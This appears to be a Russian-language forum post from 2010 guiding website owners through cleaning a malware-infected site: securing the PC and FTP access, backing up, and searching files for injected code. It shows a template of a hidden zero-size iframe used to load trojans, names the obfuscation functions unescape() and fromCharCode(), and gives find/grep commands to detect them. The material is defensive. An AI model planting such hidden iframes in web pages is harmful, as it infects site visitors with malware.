• Страница 1 из 1
  • 1
Модератор форума: SmokeRom, Vlad98  
Вирус на сайте?
Дата: Понедельник, 29.11.2010, 16:54 | Сообщение # 1
Сообщений:615
Клан:[RZR]
Награды:60
70
Порядок действий

1. Срочно проверьте свой компьютер на наличие вирусов. Пароли доступа ФТП обычно воруют трояны, которые заразили Ваш компьютер или компьютер другого сотрудника, знающего доступ ФТП к сайту.
2. Срочно смените ФТП доступ к сайту. Чаще всего именно по ФТП происходит заражение сайтов.
3. Подготовьтесь к лечению сайта. Сделайте бекап сайта, сохраните веблоги посещаемости сайта и запросите у техподдержки хостинга лог подключений по ФТП к сайту. Логи могут потребоваться для поиска хакера и выявления способа заражения сайта.
4. Приступайте к поиску и удалению вируса.

На заметку! Действовать нужно именно в указанном порядке: сначала проверяйте компьютер и только потом меняйте доступ ФТП. Иначе, смысла не будет. Если Вы сначала поменяете доступ ФТП к сайту, а компьютер всё ещё будет заражён вирусом, то новые пароли снова будут украдены!

Только убедившись, что Ваш компьютер больше не заражён и, сменив ФТП доступы к сайту, можно переходить к следующим этапам, непосредственно к поиску и удалению вируса с сайта.

Поиск и удаление вируса с сайта

Прежде, чем искать вирусы на сайте, необходимо знать как они выглядят и где именно их следует искать.

Как может выглядеть код вируса на сайте

Существуют всего несколько самых распространённых кодов вирусов, которые используются для размещения на страницах сайтов. Все они используют одну и ту же уязвимость переполнения буфера браузеров, особенно, «IE». Уязвимость заключается в том, что с помощью специального кода (iframe) можно незаметно загрузить и запустить на компьютере жертвы любой файл.

Первое, на что следует обратить внимание — это подозрительный HTML код с подключением <iframe>. Обычно, подобные ифреймы стараются сделать незаметными для посетителей сайта, поэтому в свойствах тега указывают специальные параметры. Например, width="0" height="0", что делает их невидимыми на страницах.

Например, код вставки вируса может выглядеть так:

<iframe src="http://адрес сайта, подгружаещего трояна" width="0" height="0" style="hidden" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></iframe>

Согласитесь, включения подозрительных iframe обнаружить достаточно просто. Злоумышленники постоянно совершенствуют свои атаки, стараются усложнить лечение и маскируют iframe с вирусами таким образом, чтобы они были неузнаваемыми не профессионалами.

Маскирование делается с помощью шифрования кода (обфускации). В результате опознать подозрительный код можно только по наличию специфичных функций JavaScript unescape() или fromCharCode(), которые используются для шифрования.

На заметку!

Второе, на что следует обращать особое внимание — это подозрительное использование функции unescape().

Существуют и другие приёмы маскирования кода трояна, но смысл остаётся тот же — это особым образом вставленный скрытый тег iframe!

В каких файлах следует искать код вируса

Как правило, заражению подвергаются файлы PHP скриптов (в названии таких файлов используется расширение php) и обычные HTML страницы (расширение html или htm). Следует обращать внимание на дату модификации файлов. Посмотрите, какие из файлов были изменены совсем недавно!

Если файлов на сайте немного, то их все можно просмотреть в ручную и визуально найти подозрительные коды HTML или JavaScript, которые нужно будет удалить. Если же Ваш сайт достаточно развит и содержит сотни и даже тысячи страниц, то искать и удалять чужеродные скрипты задача не из простых.

Скрипт для поиска подозрительных файлов

Если Вам сложно использовать команды SSH для поиска файлов по шаблону, предлагаем воспользоваться нашим несложным скриптом quick-search.php на языке PHP (у скачиваемого файла расширение .txt, чтобы Вы могли его скачать, а не запускать поиск вирусов на нашем сервере).

Чтобы воспользоваться нашим скриптом, сделайте следующее:

  • Скачайте файл скрипта;
  • Измените расширение с .txt на .php;
  • При необходимости, измените настройки скрипта согласно своим нуждам. По умолчанию указаны настойки, подходящие для большинства случаев;
  • Закачайте скрипт на свой сервер, например, в корень веб-сайта;
  • Запустите скрипт, зайдя на свой сайт, например, по адресу: http://www.бла-бла-бла.ru/quick-search.php (конечно, вместо www.бла-бла-бла.ru следует указать название своего сайта);
    * Обязательно визуально проверьте содержимое всех подозрительных файлов, найденных скриптом. В случае обнаружения в них кода вируса, удалите его из каждого файла вручную.

    На заметку!

    Чтобы уменьшить будущие риски заражения Вашего сайта, рекомендуем создавать сложные пароли и не хранить их в программах. А также, обязательно установите на свой компьютер рекомендуемый пакет программ для защиты от вирусов.

    Теперь Вы должны хорошо представлять, что искать на сервере и в каких файлах. Убедившись, что сайт был действительно подвержен заражению, актуальной становится проблема по поиску и чистке всех испорченных файлов.

    Как выявить все испорченные файлы

    Как мы уже заметили ранее, файлов и различных скриптов на сайте может быть очень много. И проверить их все вручную слишком накладно. Для решения задачи нужен правильный, оптимальный подход.

    Задача состоит в поиске файлов, содержащих определённые участки кода, например, iframe или unescape. Подобный поиск лучше всего делать, используя регулярные выражения. Одни, используют встроенные средства поиска и утилиты операционной системы, другие, пишут свои скрипты на языке PHP, индивидуально настраивая регулярные выражения для лечения конкретного заражения сайта.

    Приведём полезный пример, который может значительно облегчить поиск заражённых файлов на сервере.

    Подозрительные файлы можно выявить командами следующего вида:

    find $PWD -name '*.*' -exec grep -li "iframe" {} \;

    find $PWD -name '*.*' -exec grep -li "unescape" {} \;

    find $PWD -name '*.*' -exec grep -li "fromCharCode" {} \;

    Выполнять их следует, подключившись к сайту по SSH и перейдя в корневую директорию сайта. Результатом выполнения команд будет нужный нам список файлов, которые содержат искомые подозрительные участки кода. Вам лишь потребуется проверить файлы по списку и в случае необходимости исправить их.

    Не забывайте, если файл содержит вставку iframe, это ещё не гарантирует, что речь идёт о вирусе. Существует много полезных скриптов, которые вполне законно используют возможности html. Поэтому лечить файлы следует очень аккуратно и внимательно.

    На заметку!

    Как защитить сайт и комп*ютер от вирусов

    Сообщение отредактировал [OMG][MaxMinimal] - Понедельник, 29.11.2010, 17:09
    • Страница 1 из 1
    • 1
    Поиск: